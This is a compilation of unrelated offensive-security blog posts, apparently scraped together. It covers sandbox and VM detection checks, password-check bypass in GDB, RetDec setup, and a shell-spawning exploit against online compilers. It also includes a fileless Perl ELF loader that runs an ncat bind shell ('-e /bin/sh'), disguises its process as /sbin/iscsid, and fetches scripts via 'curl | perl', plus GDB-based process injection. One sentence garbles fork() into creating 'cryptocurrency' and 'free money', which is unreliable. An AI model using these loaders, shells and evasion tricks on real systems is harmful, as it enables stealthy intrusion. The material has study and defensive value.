    • «\\.\VBoxGuest»
    • «\\.\pipe\VBoxMiniRdDN»
    • «\\.\VBoxTrayIPC»
    • «\\.\pipe\VBoxTrayIPC»)
    • «\\.\HGFS»
    • «\\.\vmci»
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • SMBIOS string checks (VMWare)
    • SMBIOS string checks (Qemu)
    • ACPI string checks (VirtualBox)
    • ACPI string checks (VMWare)
    • ACPI string checks (Qemu)
  • Driver Services
    • VirtualBox
    • VMWare
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe(VMWARE)
    • vmwaretray.exe(VMWARE)
    • vmwareuser(VMWARE)
    • VGAuthService.exe (VMWARE)
    • vmacthlp.exe (VMWARE)
    • vmsrvc.exe(VirtualPC)
    • vmusrvc.exe(VirtualPC)
    • prl_cc.exe(Parallels)
    • prl_tools.exe(Parallels)
    • xenservice.exe(Citrix Xen)
    • qemu-ga.exe (QEMU)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (GENERIC)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
    • SELECT * FROM Win32_Computer (Model and Manufacturer) (GENERIC)
    • SELECT * FROM MSAcpi_ThermalZoneTemperature CurrentTemperature) (GENERIC)
  • DLL Exports and Loaded DLLs
    • avghookx.dll (AVG)
    • avghooka.dll (AVG)
    • snxhk.dll (Avast)
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • «KVMKVMKVM\0\0\0» (KVM)
        • «Microsoft Hv»(Microsoft Hyper-V or Windows Virtual PC)
        • «VMwareVMware»(VMware)
        • «XenVMMXenVMM»(Xen)
        • «prl hyperv «( Parallels) -«VBoxVBoxVBox»( VirtualBox)

Anti-Analysis

  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks

  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques

  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Contributors

References

Reverse Engineering x64 for Beginners – Linux

As to get started, we will be writing a simple C++ program which will prompt for a password. It will check if the password matches, if it does, it will prompt its correct, else will prompt its incorrect. The main reason I took up this example is because this will give you an idea of how the jump, if else and other similar conditions work in assembly language. Another reason for this is that most programs which have hardcoded keys in them can be cracked in a similar manner except with a bit of more mathematics, and this is how most piracy distributors crack the legit softwares and spread the keys.

Let’s first understand the C++ program that we have written. All of the code will be hosted in my Github profile :-

https://github.com/paranoidninja/ScriptDotSh-Reverse-Engineering

The code is pretty simple here. Our program takes one argument as an input which is basically the password. If I don’t enter any password, it will print the help command. If I specify a password, it gets stored as a char with 10 bytes and will send the password to the check_pass() function. Our hardcoded password is PASSWORD1 in the check_pass() function. Out here, our password get’s compared with the actual password variable mypass with the strcmp() function. If the password matches, it returns Zero, else it will return One. Back to our main function, if we receive One, it prints incorrect password, else it prints correct password.

Now, let’s get this code in our GDB debugger. We will execute the binary with GDB and we will first setup a breakpoint on main before we send the argument. Secondly, we will enable time travelling on our GDB, so that if we somehow go one step ahead by mistake, we can reverse that and come one step back again. This can be done with the following command: target record-full and reverse-stepi/nexti

Dont’ be scared if you don’t understand any of this. Just focus on the gdb$ part and as you can see above, I have given an incorrect password as pass123 after giving the breakpoint with break main. My compiled code should print an incorrect password as seen previously, but as we proceed, we will find two ways to bypass the code; one is by getting out the actual password from memory and second is by modifying the jump value and printing that the password is correct.

Disassembly

The next step is to disassemble the entire code and try to understand what actually is happening:

Our main point of intereset in the whole disassembled code would be the below few things:

1. je – je means jump to an address if its equal to something. If unequal, continue with the flow.

2. call – calls a new function. Remember that after this is loaded, the disassembled code will change from the main disassembly function to the new function’s disassembly code.

3. test – check if two values are equal

4. cmp – compare two values with each other

4. jne – jne means jump to and address if its not equal to something. Else, continue with the flow.

Some people might question why do we have test if we have cmp which does the same thing. The answer can be found here which is explained beautifully:-

https://stackoverflow.com/questions/39556649/linux-assembly-whats-difference-between-test-eax-eax-and-cmp-eax-0

So, if we see the disassembly code above, we know that if we run the binary without a password or argument, it will print help, else will proceed to check the password. So this cmp should be the part where it checks whether we have an arguement. If an arguement doesn’t exist it will continue with the printing of help, else it will jump to <main+70>. If you see that numbers next to the addresses on the left hand side, we can see that at <+70>, we are moving something into the rax register. So, what we will do is we will setup a breakpoint at je, by specifying its address 0x0000000000400972 and then will see if it jumps to <+70> by asking it to continue with c. GDB command c will continue running the binary till it hits another breakpoint.

And now if you do a stepi which is step iteration, it will step one iteration of execution and it should take you to <+70> where it moves a Quad Word into the rax register.

So, since our logic is correct till now, let’s move on to the next interesting thing that we see, which is the call part. And if you see next to it, it says something like <_Z10check_passPc> which is nothing but our check_pass() function. Let’s jump to that using stepi and see what’s inside that function.

Once, you jump into the check_pass() function and disassemble it, you will see a new set of disassembled code which is the code of just the check_pass() function itself. And here, there are four interesting lines of assembly code here:

The first part is where the value of rdx register is moved to rsi and rax is moved to rdi. The next part is strcmp() function is called which is a string compare function of C++. Next, we have the test which compares the two values, and if the values are equal, we jump (je) to <_Z10check_passPc+77> which will move the value Zero in the eax register. If the values are not equal, the function will continue to proceed at <+70> and move the value One in the eax register. Now, these are nothing but just the return values that we specified in the check_pass() function previously. Since we have entered an invalid password, the return value which will be sent would be One. But if we can modify the return value to Zero, it would print out as “Correct Password”.

Also, we can go ahead and check what is being moved into the rsi and the rdi register. So, let’s put a breakpoint there and jump straight right to it.

As you can see from the above image, I used x/s $rdx and x/s $rax commands to get the values from the register. x/s means examine the register and display it as a string. If you want to get it in bytes you can specify x/b or if you want characters, you can specify x/c and so on. There are multiple variations however. Now our first part of getting the password is over here. However, let’s continue and see how we can modify the return value at <_Z10check_passPc+70> to Zero. So, we will shoot stepi and jump to that iteration.

Epilogue

As you can see above, the function moved 0x1 to eax in the binary, but before it can do a je, we modified the value to 0x0 in eax using set $eax = 0x0 and then continued the function with c as below, and Voila!!! We have a value returned as Correct Password!

Learning assembly isn’t really something as a rocket science. But given a proper amount of time, it does become understandable and easy with experience.

This was just a simple example to get you started in assembly and reverse engineering. Now as we go deeper, we will see socket functions, runtime encryption, encoded hidden domain names and so on. This whole process can be done using x64dbg in Windows as well which I will show in my next blogpost.

Retargetable Machine-Code Decompiler: RetDec

RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:

  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

 

Features:

  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.

 

After seven years of development, Avast open-sources its machine-code decompiler for platform-independent analysis of executable files. Avast released its analytical tool, RetDec, to help the cybersecurity community fight malicious software. The tool allows anyone to study the code of applications to see what the applications do, without running them. The goal behind open sourcing RetDec is to provide a generic tool to transform platform-specific code, such as x86/PE executable files, into a higher form of representation, such as C source code. By generic, we mean that the tool should not be limited to a single platform, but rather support a variety of platforms, including different architectures, file formats, and compilers. At Avast, RetDec is actively used for analysis of malicious samples for various platforms, such as x86/PE and ARM/ELF.

 

What is a decompiler?

A decompiler is a program that takes an executable file as its input and attempts to transform it into a high-level representation while preserving its functionality. For example, the input file may be application.exe, and the output can be source code in a higher-level programming language, such as C. A decompiler is, therefore, the exact opposite of a compiler, which compiles source files into executable files; this is why decompilers are sometimes also called reverse compilers.

By preserving a program’s functionality, we want the source code to reflect what the input program does as accurately as possible; otherwise, we risk assuming the program does one thing, when it really does another.

Generally, decompilers are unable to perfectly reconstruct original source code, due to the fact that a lot of information is lost during the compilation process. Furthermore, malware authors often use various obfuscation and anti-decompilation tricks to make the decompilation of their software as difficult as possible.

RetDec addresses the above mentioned issues by using a large set of supported architectures and file formats, as well as in-house heuristics and algorithms to decode and reconstruct applications. RetDec is also the only decompiler of its scale using a proven LLVM infrastructure and provided for free, licensed under MIT.

Decompilers can be used in a variety of situations. The most obvious is reverse engineering when searching for bugs, vulnerabilities, or analyzing malicious software. Decompilation can also be used to retrieve lost source code when comparing two executables, or to verify that a compiled program does exactly what is written in its source code.

There are several important differences between a decompiler and a disassembler. The former tries to reconstruct an executable file into a platform-agnostic, high-level source code, while the latter gives you low-level, platform-specific assembly instructions. The assembly output is non-portable, error-prone when modified, and requires specific knowledge about the instruction set of the target processor. Another positive aspect of decompilers is the high-level source code they produce, like  C source code, which can be read by people who know nothing about the assembly language for the particular processor being analyzed.

 

Installation and Use

Currently,RetDec support only Windows (7 or later) and Linux.

 

Windows

  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec’s Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    bash decompile.sh test.exe
    

    For more information, run bash decompile.sh --help.

 

Linux

  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution’s package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    ./decompile.sh test.exe
    

    For more information, run ./decompile.sh --help.

 

Build and Installation


Requirements

Linux

On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:

sudo apt-get install build-essential cmake git perl python bash coreutils wget bc graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf pkg-config m4 libtool

 

Windows

  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec’s Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

 

Process

Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr,/usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. 

  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.

You have to pass the following parameters to cmake:

  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.

You can pass the following additional parameters to cmake:

  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

int main(void) {

            double myNumber = 1337.77;

 

            std::cout << myNumber << std::endl;

 

            return 0;

}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand that this means we are storing the value at the offset of -12 from register r11 into r2. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset location or specifically stored into 0x7efff230 in memory.

Let’s step into twice which executes the vldr d0, [r11, #-12] as we understand that 1337.77 will now be loaded into the double precision math coprocessor d0 register. Let’s now print the value at that location below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

Take full control of online compilers through a common exploit

Online compilers are a handy tool to save time and resources for coders, and are freely available for a variety of programming languages. They are useful for learning a new language and developing simple programs, such as the ubiquitous “Hello World” exercise. I often use online compilers when I am out, so that I don’t have to worry about locating and downloading all of the resources myself.

Since these online tools are essentially remote compilers with a web interface, I realized that I might be able to take remote control of the machines through command injection. My research identified a common weakness in many compilers: inadequate sanitization of user-submitted code prior to execution. My analysis revealed that this lack of input filtration enables exploits that an hacker can use to take control of the machine or deliberately cause it to crash.

A clever attacker can exploit built-in C functions and POSIX libraries to gain control over the computer hosting the online compiler. Commands like execl()system(), and GetEnv() can be used to probe the target machine operating system and run any command on its built-in shell.

Vulnerability description


Gaining access

In several of the C/C++ compilers that I analyzed, the GetEnv(), system(), functions allow an attacker to study and execute any command on the remote machine. The GetEnv() function allows a hacker to learn information about the machine that is otherwise concealed from the web interface such as the username an OS version.

Once this information is revealed, the attacker can begin testing various exploits to achieve privilege escalation and gain access to a root shell. For example, the system() command can be used to execute malicious code and access sensitive data such as logs, website files, etc.

Since the exploit I discovered involves inserting hostile commands to gain control of an unwitting machine, this attack vector is classified as a “code injection” vulnerability.

 

Maintaining control

If hacker tries to run the online compiler every time they want to send a new command, the attack would leave an obvious trace, and the resource use might draw attention to the suspicious activity. These obstacles can be conveniently sidestepped by using the execl() function, which allows the user to specify any arbitrary program to replace the current process. An attacker can gain access to the machine’s built-in shell by invoking the execl() function to replace the current process with /bin/sh, with catastrophic implications.

Many compilers allow input from the browser, in which case the hacker can craft a program to relay input commands to the shell of the compromised machine. Once the hacker uses execl() to open a shell via browser, they can simply operate the remote machine using system() to inject various instructions. This avoids the need to run the compiler each time the attacker wishes to explore or exploit the compromised machine.

Implications


A hacker that obtains shell access in this way gains access to files and services typically protected from outside users. The attacker now has many options at their disposal for exploiting the machine and/or wreaking havoc; how they proceed will depend on their tools and motives.

If the attacker wishes to crash the target machine, they can achieve this by (mis)using the fork() function, which creates a new cryptocurrency and generates free money clone of the current process. A fork() function placed within a while (true) loop will execute indefinitely, repeatedly cloning the process to greedily consumed precious RAM memory. This rapid uncontrolled use of resources will overwhelm the machine, causing a self-DOS (denial of service attack).

Instead of maliciously crashing a machine, an attacker may wish to monetize their illicit access. This can be accomplished by injecting a cryptocurrency miner, which will generate funds for the attacker at the expense of the victim’s computational resources and electric bill. My analysis showed that this maneuver allows useful exploitation of online compilers that successfully stymied other attacks by sandboxing the environment or adopting more advanced techniques to limit file access.

Theory


This section documents the commands used to gain and maintain access to the online compiler. These functions require the unistd.h and stdlib.h libraries.

execl()
Declaration
int execl(const char *pathname, const char *arg, ...);
Parameters

pathname — char*, the name of the program

arg — char*, arguments passed to the program, specified by pathname

Description

The execl() function replaces the current process with a new process. This is the command exploited to maintain control over the remote machine without having to repeatedly use the online compiler. Reference the underlying execve() function for more details.

 

System()
Declaration
int system (const char* command);
Parameters

command — char* command name

Description

The C system function passes the command name, specified by command, to the host’s built-in shell (/bin/sh for UNIX-based systems) which executes it. This function is based on execl(), so system() will be called by executing:

execl(, "sh", "-c", command, (char *)0);
Return

This function returns the output of the command after it has been executed. If the shell encounters an error while executing the command, it will return the numeric value -1.

GetEnv()
Declaration
char *getenv(const char *name)
Parameters

name — const char* variable name.

Description

Retrieves a string containing the value of the environment variable whose name is specified as an argument ( name ).

Return

The function returns the contents of the requested environment variable as a string. If the requested variable is not part of the list of environments, the function returns a null pointer.

Proof of Concepts


#include "stdio.h"
#include "unistd.h"

int main(){
	 execl("/bin/sh",NULL,NULL); // Open the shell 
	 return 0;
}
#include "stdio.h"
#include "stdlib.h"

int main(){
	system("whoami"); // Find username 
	system("cd / && ls"); // Lists all files and directories on /
	return 0;
}

Solutions


Thankfully, most of the risks highlighted above can be mitigated relatively easily. Access to protected files and services can be prevented by creating a secure sandbox for the application. This minimizes the potential for collateral damage and inappropriate data access, but will not prevent some attacks such as cryptocurrency miner injection. In order to avoid these «mining» attacks, the sandbox should have limited resources and it should be able to reboot itself every 10 minutes.

To eliminate the underlying weakness, the libraries could be recompiled without the particular exploitable functions. An attacker cannot gain a foothold if the execl() and system() are removed or disabled by recompiling libraries.

Screenshots


 

In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. asciicast

In C (translate to your non-disk-touching language of choice):

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(pid, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);

Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) orLD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: dlopen(3)from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

